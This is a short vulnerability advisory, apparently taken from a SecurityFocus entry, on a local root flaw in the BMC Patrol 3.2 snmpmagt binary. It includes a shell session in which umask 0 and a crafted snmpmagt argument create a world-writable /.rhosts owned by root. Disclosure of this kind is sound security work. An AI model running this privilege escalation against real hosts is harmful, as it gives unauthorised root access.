26 lines
No EOL
1.2 KiB
Text
26 lines
No EOL
1.2 KiB
Text
source: https://www.securityfocus.com/bid/525/info
|
|
|
|
|
|
Patrol 3.2, installed out of the box, allows for a local root compromise or denial of service. The vulnerability lies in the creation of a file by snmpagnt that is owned by the owner of the parent directory of the file and possibly world writeable. A local user can specify any file (/.rhosts) and create it / set the permissions according to the user's umask.
|
|
|
|
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al snmpmagt
|
|
-rwsr-xr-x 1 root users 185461 Mar 6 1998 snmpmagt*
|
|
|
|
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
|
|
/.rhosts not found
|
|
|
|
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> umask 0
|
|
|
|
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> snmpmagt yoyoyo /.rhosts
|
|
|
|
yoyoyo: No such file or directory
|
|
snmp bind failure: Address already in use
|
|
/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin/snmpmagt: error processing configuration
|
|
|
|
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
|
|
-rw-rw-rw- 1 root users 770 Jul 13 14:42 .rhosts
|
|
|
|
note: If the file exists, it keeps the same perms and overwrites it
|
|
with "i^A" then the result of gethostname() and some whitespace. this
|
|
problem is not platform dependent and was tested based on out of box
|
|
install on an HP. |